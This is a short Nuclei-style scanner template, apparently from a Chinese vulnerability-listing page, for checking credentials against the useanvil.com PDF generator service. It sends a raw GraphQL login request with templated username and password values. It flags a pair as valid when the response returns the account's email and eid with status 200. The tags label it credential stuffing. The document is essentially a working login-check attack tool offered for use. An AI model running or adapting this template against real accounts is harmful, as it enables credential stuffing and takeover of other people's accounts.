漏洞描述
Checks for a valid avnil pdf generator account.
avnil-pdf-generator-check: useanvil.com Login Check
PoC代码[已公开]
id: avnil-pdf-generator-check
info:
name: useanvil.com Login Check
author: parthmalhotra,pdresearch
severity: critical
description: Checks for a valid avnil pdf generator account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
max-request: 1
tags: cloud,creds-stuffing,login-check,avnil-pdf,vuln
self-contained: true
http:
- raw:
- |
POST https://graphql.useanvil.com/ HTTP/1.1
Host: graphql.useanvil.com
Content-Length: 367
Content-Type: application/json
{"operationName":"LoginMutation","variables":{"email":"{{username}}","password":"{{password}}"},"query":"mutation LoginMutation($email: String, $password: String) {\n login(email: $email, password: $password) {\n eid\n firstName\n lastName\n email\n preferences {\n require2FA\n __typename\n }\n extra\n __typename\n }\n}\n"}
extractors:
- type: dsl
dsl:
- username
- password
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"email":"'
- '"eid":"'
- type: status
status:
- 200
# digest: 4a0a00473045022100f25756a6fd701d7dce016ebe83d43573e2d3bd143de924cd6d2786d0ccfb3fa602205bd1544724388a336cba6887926237c3b7e05a97300ac65a8a5052ac05c50ab5:922c64590222798bb761d5b6d8e72950